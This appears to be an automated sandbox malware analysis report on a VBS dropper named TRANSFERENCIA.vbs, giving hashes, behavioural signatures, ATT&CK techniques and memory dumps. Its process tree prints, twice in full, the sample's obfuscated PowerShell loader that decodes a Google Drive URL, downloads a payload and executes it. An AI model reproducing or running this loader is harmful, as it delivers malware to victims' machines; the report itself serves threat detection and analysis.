047a32d755255cc196414105150bc45efe6bd37d1d0951ff7b7628321227cae6

General

Target

TRANSFERENCIA.vbs
Size

37KB
MD5

70e2f192eb252c254ebdfb15dd1f6817
SHA1

a62bf451789a65d45678e691760c81c3d412b49c
SHA256

047a32d755255cc196414105150bc45efe6bd37d1d0951ff7b7628321227cae6
SHA512

8e8b9b9068c37603e01c74a34c24400afb6594f2d05b9ea8969c3606ce128f4191650ec72437cab639c4c9af7522b1b6dc3425d7f6ab08d5bac5615a095efdbe
SSDEEP

768:u0zgBjYWAZGc8NnKwiQMYbAPjDpHLFggPYC:4YqNnKwkeAXhL6gPx

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

32 drive.google.com
33 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3568 2036 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2156 powershell.exe
2156 powershell.exe
2036 powershell.exe
2036 powershell.exe
2036 powershell.exe
2036 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2156 powershell.exe
Token: SeDebugPrivilege 2036 powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
32	drive.google.com
33	drive.google.com

pid	pid_target	process	target process
3568	2036	WerFault.exe	powershell.exe

pid	process
2156	powershell.exe
2156	powershell.exe
2036	powershell.exe
2036	powershell.exe
2036	powershell.exe
2036	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	2036	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2068 wrote to memory of 2156	2068	WScript.exe	powershell.exe
PID 2068 wrote to memory of 2156	2068	WScript.exe	powershell.exe
PID 2156 wrote to memory of 1316	2156	powershell.exe	cmd.exe
PID 2156 wrote to memory of 1316	2156	powershell.exe	cmd.exe
PID 2156 wrote to memory of 2036	2156	powershell.exe	powershell.exe
PID 2156 wrote to memory of 2036	2156	powershell.exe	powershell.exe
PID 2156 wrote to memory of 2036	2156	powershell.exe	powershell.exe
PID 2036 wrote to memory of 2588	2036	powershell.exe	cmd.exe
PID 2036 wrote to memory of 2588	2036	powershell.exe	cmd.exe
PID 2036 wrote to memory of 2588	2036	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TRANSFERENCIA.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Disimpassioned parcelhusejernes nervepatient ngtede polyhaemic Landsforrder #>;$Martlemas=(cmd /c set /A 115^^0);Function Kipsey ([String]$Nephrotomies){$Electrotonizes=[char][int]$Martlemas+'ubstring';$Longicaudal=8;$Utmosts=Toxinosis26($Nephrotomies);For($Reparationsvrksted=7; $Reparationsvrksted -lt $Utmosts; $Reparationsvrksted+=$Longicaudal){$Markeringsfelter=$Nephrotomies.$Electrotonizes.Invoke($Reparationsvrksted, 1);$Turbith=$Turbith+$Markeringsfelter;}$Turbith;}function Sankthansbaal ($Parasuchian){& ($Esotropia) ($Parasuchian);}function Toxinosis26 ([String]$Rejfet){$Greentail=$Rejfet.Length-1;$Greentail;}$Vagtparaderne=Kipsey 'SkjorteTBengerdr F,stelaBldgrinnUtaknems Sv.nesfbrushoveAnskaffrC.ayiesr PreachiVerifiknSmutchigLdr raa ';$slantedness=Kipsey ' GeschfhKikker.t Morgent Rev ltp Gryd,ssAsk.bge:Palmery/Ekserci/Morgen dUnserflrorthoptikompletv CulmineGrundca.Kagosorg insolvosemip toU,gdommgfeudalilAvlshineNu.hale.na,urercIntravaoMed,ocamBrnesko/ Afp.snutriflorc Bang,e?Uncon,iedragonhxTymbalop non.ccoMindederTeks ndt,eklapp=PrivilydSndenvioFoldedrwconjoinn BreedilHonni go R ymemaThorou,dTriu,vi&Kna,rybiForpag.dMarkrpo=Tilsend1omregnivcivilisjEndossezSvrv.tsTTrimler8 Forp.gzW nterw0Syvaarsh BogfinbMiso,raMVirksomiSlskindoE.doradS Vandb XFo,eskrNLegegadkHaandre0DuikersiHofjgerPC.direc6OutpursnSuppeu,tBlanksvZH.patolzAgnaticzThemeleZdworkin_Impelle2,onorrsvSmalhanOUpdatab0Aphoru,pSteeple ';$Esotropia=Kipsey ' eredti CampimeSt rstaxCirkeld ';$spokesman=Kipsey 'Si.eman$Fusionsg EtablelTaarnfao Vel.aebKafferiaun,rmorlPicnice:offe.ceNkullagro lotyitmklorofoetipvogns Docile3Udfo,rt5 Preaff Alchem=.iscoli jertefSOrientetKera,noaTaagebarPralw,rtUprootr-LeasowoB .pposii amordntStemmepsBicycleTVariat,rRembo,ra Kampfrn Forly s Helfa.fFarvenaeOophoror Reg.ow Farvef-Dona,caSBesotteoSpnd,tau ProfitrCorrinacsenge,ieGavlvgg Failleb$Splashiswidowhol Ed lweaIntr,pen tockantDamgalne Beamfud L nsgrnRedonneeHandelssAsiphonsDo umen Murlac- TeamwiDLabyr.neChappalsale,zertMoralisiStintsfnNongildaBarytontNot,fici PagajsoFast.mrnSiculia Kobolte$UnderstPSurn mer Ki.opoo IntenscoldiesprDeekpaxeVin.sidaBerigeltRedefu.i Filtr v .enatsiZophiast Surfbry Brands ';Sankthansbaal (Kipsey ' Taskse$AntiarrgAbaramblMetallioU.pregnbUnmateraS.udsiglMindehj:LapsibiP Probler onvento MicrodcAft rnorKnaldroe cclaiaSha.lottAlkoh.li,olartrvViseingiIsaiasftA finnmyBraktea=Jag.rne$FrihedsesultrienUsurpatvSmackfu:Count oaHjttalep op,niop UndermdFlocculaSvejtset Destina Inhabi ') ;Sankthansbaal (Kipsey 'Mirk.neIpustenhmDeneziap Age acoKronernrF.ancoptDrift t- ComparM Pi.cago HyposudFiskeriuTavernelFuckupseFiltrat HvaelveBSmovsesi,eknocktBefringsAfricanT,angnserMarvellaCorruptnObsequisTakstlefhjlpel,eNudi.mpr Patt b ') ;$Procreativity=$Procreativity+'\Palmyrenian.Sny' ;Sankthansbaal (Kipsey 'Sujetsp$ Staff.gAhornenlDauphino RetsfobWhet,toaAllomerlLa.dbru:.oonotisOblocutkD.namitvFordrineBovarysr SquinseAttendasUnsabre=Jewel,b( SrbeskTBladelee.lyantssCryophitBremsni-exte,ocPRetir,naTegugurtSuperbthRestrov fordybe$SemisapPVoci,errFaglittoun.eutrcLiv.ryhr tapsameSubsi.ia Registt .ietfeiXanthiuv Gu.toriAfsmelttPeruaney sdeste)Bonefis ') ;while (-not $skveres) {Sankthansbaal (Kipsey ' Pro orIdominerfD savou skylig(Maaneds$OrkestrNUnridgeoTeddysbm Co grue amembesBiperso3 Skift.5Plemu l.OplaesnJtungnemoAftenshbUn,aileSUnwillatWoolsroa ReinhetOmdelereMeliora Bagager- Indhole Nomostq Intell Dehones$TriplumVstroganaForsynig Parse t Udst,ppGravlsmaDorkyrkr Umbraeacrissald Undisme,soglosrSneplovn FlungaeCrusf u)Pulveri Skuffel{ S.pervS ankrvetSamburuaI.accesrSkalle tThermon-Incr,stSConidael.ausatieEarthiae Koalacp Okk rf Rekonf1Skrum e} lectreSkurvoglEffe tisBanteree Card.o{subwariSMullah.tSheepifaRosier,r MassestRearr.n-.yzoneoSspisesklAngrebseParaphreBegribepScenisk Pro.und1.wiscar;OverligSGua.emaaPazareenUstad,gkRdbedemtMicr,phhLaanekoaterrac.n Alu.ins Refu,eb U.sletaHospitaa,epaticlSe ilen Outwigg$Hsblse,sSofficepUnderenoGratulek ScupcoeRebslagsTilbagemMajorisaForsnakn,ntenod}Queendo ');Sankthansbaal (Kipsey 'K llati$HydrodagReorganlKoerte.oStanglobSkannesaprovinslHaybo.b:Gvendess mmatrikPiroghivappendie Sanskrr ikkereToysomesSakrame=Onymi e(AntichuT alamine BibliosSaroscrtIndehol-AmylamiPCa.tocka nincistDekant hCrepies Ballon $ InerasP Dragomrge nemloReinvigcO dypegrAppalooe BredtfaPatentetOmarbeji KarikavrendejeiIde liztbecifreyOuroupa) Operet ') ;}Sankthansbaal (Kipsey ' selfin$ Nonsa,gKit elalBulder o B ickcbDesertraB.ggingl.ooknin:Co.potoB udfyldr.iveaudi ContincKapitalk SalsdrbUnderflaSo,rilytMrbanketb azileeElskerrdsa iriz Endothe= Sengel ProbabiGDingleve,aadedetSmalfil-ulvemlkCSaros,toCab,ioln F aadetSpindhre KinesenApprovatJvnald. datain$ A.lvniPPidgin,rO,fentlo EtnogrcKop masrFosf,rdeTyttebraRingea,tFlatteniPlasmoqvR sentfi KalkaftguatemayDecaste ');Sankthansbaal (Kipsey 'Skvatml$Gu.hibogIssuelelGymno,ooPr.sensb Undersa Epuratl edlige:NyanskaBNedsivneTo tinggPreconqrSchratmnSte,messTransit Anspori=Extrosp Type j[TelevseSRoquefoyElektrosInkvisitUndervae Blond,mSu cort. P,enesCLinjesto Stilren,lkevejv M.serseErotiserMon,strtWatersc]Mesterv:Slovint:PulmentFflutey,rComplemo EdanbymLevn,tpBSvinekdaDisro,ssarbitraeOmklamr6Vor,eds4EmbalmeSOff.rplt Fasci.rantiasci TrickinHistorig Tilhre(Dumfoun$MiltiesBRe.tergrSubjektiBankvsecP mpstek PhysiobManheadaHjemme.tToxi.ertSpadonieHypn.tid Kaolin)Haandgr ');Sankthansbaal (Kipsey 'Dy,efab$SprngemgAntidetl Attraao Murcheb Tids,sa Bjldedl erbyli:StvboldPOvercurePhyllodt Caponit Su,lateAnkerarrFa eldyswinkles Slunkne=Medicin Con ers[VaabensSPrecalcyUheldensSpinulat FiksereHert,llm encinc. No.dipTCochleaeAsyncpoxDomnestt Coron..EuropamE nido.onEtaminecSwa,tedoForvaltddaffod iEstim,tnIn,oxiog Friede]Quinqu : Abiosi: Ugli,iABerendsSInvaderCdamasceIOptic,sIBad,vre. DemilaGStereopeK,raktetAdmixtuSAnisboltHamamelr detiliTypisernLimaceagBortslb(Organ s$MeningsBLannileeArcs,negIntersprReallusnDism rtsFejlko.)Whiglin ');Sankthansbaal (Kipsey ' produk$ BndslegSskendelepicor omelvynrbBaroksta IndprelLesbisk:UdrejseUUnsym,tdEkviperfRedd rer Acclime Ironmal S.ortssKonvojeeAlquierrRejice s,abeisp=Counter$ ByrdefPCaref,leAfzeliatStttepitDoor.laeHeroifyrKommufas Turist.ScrapbosEncriniu yraadbI,scruts ThanketPatin.ur For.iliAngolann IndvirgPraktik( Gurgle3Motorca0grandfa4Remburs9Unterme4 Unmelo8Tegnflg,Devilfi3Skraare1 Storeb2 Kidd,e6Unserve7 Chipch)Eft,rtr ');Sankthansbaal $Udfrelsers;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:1316

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Disimpassioned parcelhusejernes nervepatient ngtede polyhaemic Landsforrder #>;$Martlemas=(cmd /c set /A 115^^0);Function Kipsey ([String]$Nephrotomies){$Electrotonizes=[char][int]$Martlemas+'ubstring';$Longicaudal=8;$Utmosts=Toxinosis26($Nephrotomies);For($Reparationsvrksted=7; $Reparationsvrksted -lt $Utmosts; $Reparationsvrksted+=$Longicaudal){$Markeringsfelter=$Nephrotomies.$Electrotonizes.Invoke($Reparationsvrksted, 1);$Turbith=$Turbith+$Markeringsfelter;}$Turbith;}function Sankthansbaal ($Parasuchian){& ($Esotropia) ($Parasuchian);}function Toxinosis26 ([String]$Rejfet){$Greentail=$Rejfet.Length-1;$Greentail;}$Vagtparaderne=Kipsey 'SkjorteTBengerdr F,stelaBldgrinnUtaknems Sv.nesfbrushoveAnskaffrC.ayiesr PreachiVerifiknSmutchigLdr raa ';$slantedness=Kipsey ' GeschfhKikker.t Morgent Rev ltp Gryd,ssAsk.bge:Palmery/Ekserci/Morgen dUnserflrorthoptikompletv CulmineGrundca.Kagosorg insolvosemip toU,gdommgfeudalilAvlshineNu.hale.na,urercIntravaoMed,ocamBrnesko/ Afp.snutriflorc Bang,e?Uncon,iedragonhxTymbalop non.ccoMindederTeks ndt,eklapp=PrivilydSndenvioFoldedrwconjoinn BreedilHonni go R ymemaThorou,dTriu,vi&Kna,rybiForpag.dMarkrpo=Tilsend1omregnivcivilisjEndossezSvrv.tsTTrimler8 Forp.gzW nterw0Syvaarsh BogfinbMiso,raMVirksomiSlskindoE.doradS Vandb XFo,eskrNLegegadkHaandre0DuikersiHofjgerPC.direc6OutpursnSuppeu,tBlanksvZH.patolzAgnaticzThemeleZdworkin_Impelle2,onorrsvSmalhanOUpdatab0Aphoru,pSteeple ';$Esotropia=Kipsey ' eredti CampimeSt rstaxCirkeld ';$spokesman=Kipsey 'Si.eman$Fusionsg EtablelTaarnfao Vel.aebKafferiaun,rmorlPicnice:offe.ceNkullagro lotyitmklorofoetipvogns Docile3Udfo,rt5 Preaff Alchem=.iscoli jertefSOrientetKera,noaTaagebarPralw,rtUprootr-LeasowoB .pposii amordntStemmepsBicycleTVariat,rRembo,ra Kampfrn Forly s Helfa.fFarvenaeOophoror Reg.ow Farvef-Dona,caSBesotteoSpnd,tau ProfitrCorrinacsenge,ieGavlvgg Failleb$Splashiswidowhol Ed lweaIntr,pen tockantDamgalne Beamfud L nsgrnRedonneeHandelssAsiphonsDo umen Murlac- TeamwiDLabyr.neChappalsale,zertMoralisiStintsfnNongildaBarytontNot,fici PagajsoFast.mrnSiculia Kobolte$UnderstPSurn mer Ki.opoo IntenscoldiesprDeekpaxeVin.sidaBerigeltRedefu.i Filtr v .enatsiZophiast Surfbry Brands ';Sankthansbaal (Kipsey ' Taskse$AntiarrgAbaramblMetallioU.pregnbUnmateraS.udsiglMindehj:LapsibiP Probler onvento MicrodcAft rnorKnaldroe cclaiaSha.lottAlkoh.li,olartrvViseingiIsaiasftA finnmyBraktea=Jag.rne$FrihedsesultrienUsurpatvSmackfu:Count oaHjttalep op,niop UndermdFlocculaSvejtset Destina Inhabi ') ;Sankthansbaal (Kipsey 'Mirk.neIpustenhmDeneziap Age acoKronernrF.ancoptDrift t- ComparM Pi.cago HyposudFiskeriuTavernelFuckupseFiltrat HvaelveBSmovsesi,eknocktBefringsAfricanT,angnserMarvellaCorruptnObsequisTakstlefhjlpel,eNudi.mpr Patt b ') ;$Procreativity=$Procreativity+'\Palmyrenian.Sny' ;Sankthansbaal (Kipsey 'Sujetsp$ Staff.gAhornenlDauphino RetsfobWhet,toaAllomerlLa.dbru:.oonotisOblocutkD.namitvFordrineBovarysr SquinseAttendasUnsabre=Jewel,b( SrbeskTBladelee.lyantssCryophitBremsni-exte,ocPRetir,naTegugurtSuperbthRestrov fordybe$SemisapPVoci,errFaglittoun.eutrcLiv.ryhr tapsameSubsi.ia Registt .ietfeiXanthiuv Gu.toriAfsmelttPeruaney sdeste)Bonefis ') ;while (-not $skveres) {Sankthansbaal (Kipsey ' Pro orIdominerfD savou skylig(Maaneds$OrkestrNUnridgeoTeddysbm Co grue amembesBiperso3 Skift.5Plemu l.OplaesnJtungnemoAftenshbUn,aileSUnwillatWoolsroa ReinhetOmdelereMeliora Bagager- Indhole Nomostq Intell Dehones$TriplumVstroganaForsynig Parse t Udst,ppGravlsmaDorkyrkr Umbraeacrissald Undisme,soglosrSneplovn FlungaeCrusf u)Pulveri Skuffel{ S.pervS ankrvetSamburuaI.accesrSkalle tThermon-Incr,stSConidael.ausatieEarthiae Koalacp Okk rf Rekonf1Skrum e} lectreSkurvoglEffe tisBanteree Card.o{subwariSMullah.tSheepifaRosier,r MassestRearr.n-.yzoneoSspisesklAngrebseParaphreBegribepScenisk Pro.und1.wiscar;OverligSGua.emaaPazareenUstad,gkRdbedemtMicr,phhLaanekoaterrac.n Alu.ins Refu,eb U.sletaHospitaa,epaticlSe ilen Outwigg$Hsblse,sSofficepUnderenoGratulek ScupcoeRebslagsTilbagemMajorisaForsnakn,ntenod}Queendo ');Sankthansbaal (Kipsey 'K llati$HydrodagReorganlKoerte.oStanglobSkannesaprovinslHaybo.b:Gvendess mmatrikPiroghivappendie Sanskrr ikkereToysomesSakrame=Onymi e(AntichuT alamine BibliosSaroscrtIndehol-AmylamiPCa.tocka nincistDekant hCrepies Ballon $ InerasP Dragomrge nemloReinvigcO dypegrAppalooe BredtfaPatentetOmarbeji KarikavrendejeiIde liztbecifreyOuroupa) Operet ') ;}Sankthansbaal (Kipsey ' selfin$ Nonsa,gKit elalBulder o B ickcbDesertraB.ggingl.ooknin:Co.potoB udfyldr.iveaudi ContincKapitalk SalsdrbUnderflaSo,rilytMrbanketb azileeElskerrdsa iriz Endothe= Sengel ProbabiGDingleve,aadedetSmalfil-ulvemlkCSaros,toCab,ioln F aadetSpindhre KinesenApprovatJvnald. datain$ A.lvniPPidgin,rO,fentlo EtnogrcKop masrFosf,rdeTyttebraRingea,tFlatteniPlasmoqvR sentfi KalkaftguatemayDecaste ');Sankthansbaal (Kipsey 'Skvatml$Gu.hibogIssuelelGymno,ooPr.sensb Undersa Epuratl edlige:NyanskaBNedsivneTo tinggPreconqrSchratmnSte,messTransit Anspori=Extrosp Type j[TelevseSRoquefoyElektrosInkvisitUndervae Blond,mSu cort. P,enesCLinjesto Stilren,lkevejv M.serseErotiserMon,strtWatersc]Mesterv:Slovint:PulmentFflutey,rComplemo EdanbymLevn,tpBSvinekdaDisro,ssarbitraeOmklamr6Vor,eds4EmbalmeSOff.rplt Fasci.rantiasci TrickinHistorig Tilhre(Dumfoun$MiltiesBRe.tergrSubjektiBankvsecP mpstek PhysiobManheadaHjemme.tToxi.ertSpadonieHypn.tid Kaolin)Haandgr ');Sankthansbaal (Kipsey 'Dy,efab$SprngemgAntidetl Attraao Murcheb Tids,sa Bjldedl erbyli:StvboldPOvercurePhyllodt Caponit Su,lateAnkerarrFa eldyswinkles Slunkne=Medicin Con ers[VaabensSPrecalcyUheldensSpinulat FiksereHert,llm encinc. No.dipTCochleaeAsyncpoxDomnestt Coron..EuropamE nido.onEtaminecSwa,tedoForvaltddaffod iEstim,tnIn,oxiog Friede]Quinqu : Abiosi: Ugli,iABerendsSInvaderCdamasceIOptic,sIBad,vre. DemilaGStereopeK,raktetAdmixtuSAnisboltHamamelr detiliTypisernLimaceagBortslb(Organ s$MeningsBLannileeArcs,negIntersprReallusnDism rtsFejlko.)Whiglin ');Sankthansbaal (Kipsey ' produk$ BndslegSskendelepicor omelvynrbBaroksta IndprelLesbisk:UdrejseUUnsym,tdEkviperfRedd rer Acclime Ironmal S.ortssKonvojeeAlquierrRejice s,abeisp=Counter$ ByrdefPCaref,leAfzeliatStttepitDoor.laeHeroifyrKommufas Turist.ScrapbosEncriniu yraadbI,scruts ThanketPatin.ur For.iliAngolann IndvirgPraktik( Gurgle3Motorca0grandfa4Remburs9Unterme4 Unmelo8Tegnflg,Devilfi3Skraare1 Storeb2 Kidd,e6Unserve7 Chipch)Eft,rtr ');Sankthansbaal $Udfrelsers;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:2588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 2240
4⤵
- Program crash
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2036 -ip 2036
1⤵
PID:4372

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vuet5msw.xry.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2036-38-0x0000000007810000-0x00000000078A6000-memory.dmp

Filesize
600KB

Download
memory/2036-19-0x00000000051D0000-0x00000000051E0000-memory.dmp

Filesize
64KB

Download
memory/2036-21-0x00000000055C0000-0x00000000055E2000-memory.dmp

Filesize
136KB

Download
memory/2036-44-0x0000000075340000-0x0000000075AF0000-memory.dmp

Filesize
7.7MB

Download
memory/2036-22-0x0000000005760000-0x00000000057C6000-memory.dmp

Filesize
408KB

Download
memory/2036-42-0x0000000007A90000-0x0000000007AA4000-memory.dmp

Filesize
80KB

Download
memory/2036-41-0x0000000007A30000-0x0000000007A52000-memory.dmp

Filesize
136KB

Download
memory/2036-40-0x00000000089D0000-0x0000000008F74000-memory.dmp

Filesize
5.6MB

Download
memory/2036-18-0x0000000075340000-0x0000000075AF0000-memory.dmp

Filesize
7.7MB

Download
memory/2036-23-0x0000000005EB0000-0x0000000005F16000-memory.dmp

Filesize
408KB

Download
memory/2036-17-0x0000000002C60000-0x0000000002C96000-memory.dmp

Filesize
216KB

Download
memory/2036-20-0x0000000005810000-0x0000000005E38000-memory.dmp

Filesize
6.2MB

Download
memory/2036-39-0x00000000077C0000-0x00000000077E2000-memory.dmp

Filesize
136KB

Download
memory/2036-37-0x0000000007740000-0x000000000775A000-memory.dmp

Filesize
104KB

Download
memory/2036-36-0x0000000007DA0000-0x000000000841A000-memory.dmp

Filesize
6.5MB

Download
memory/2036-33-0x0000000005F60000-0x00000000062B4000-memory.dmp

Filesize
3.3MB

Download
memory/2036-34-0x0000000006590000-0x00000000065AE000-memory.dmp

Filesize
120KB

Download
memory/2036-35-0x00000000065C0000-0x000000000660C000-memory.dmp

Filesize
304KB

Download
memory/2156-16-0x000001A6A9930000-0x000001A6A9940000-memory.dmp

Filesize
64KB

Download
memory/2156-43-0x00007FFE2D4D0000-0x00007FFE2DF91000-memory.dmp

Filesize
10.8MB

Download
memory/2156-7-0x00007FFE2D4D0000-0x00007FFE2DF91000-memory.dmp

Filesize
10.8MB

Download
memory/2156-47-0x00007FFE2D4D0000-0x00007FFE2DF91000-memory.dmp

Filesize
10.8MB

Download
memory/2156-6-0x000001A6A98F0000-0x000001A6A9912000-memory.dmp

Filesize
136KB

Download
memory/2156-15-0x000001A6A9930000-0x000001A6A9940000-memory.dmp

Filesize
64KB

Download
memory/2156-14-0x000001A6ABDF0000-0x000001A6ABE04000-memory.dmp

Filesize
80KB

Download
memory/2156-13-0x000001A6ABDA0000-0x000001A6ABDC6000-memory.dmp

Filesize
152KB

Download
memory/2156-12-0x000001A6A9930000-0x000001A6A9940000-memory.dmp

Filesize
64KB

Download
memory/2156-11-0x000001A6A9930000-0x000001A6A9940000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing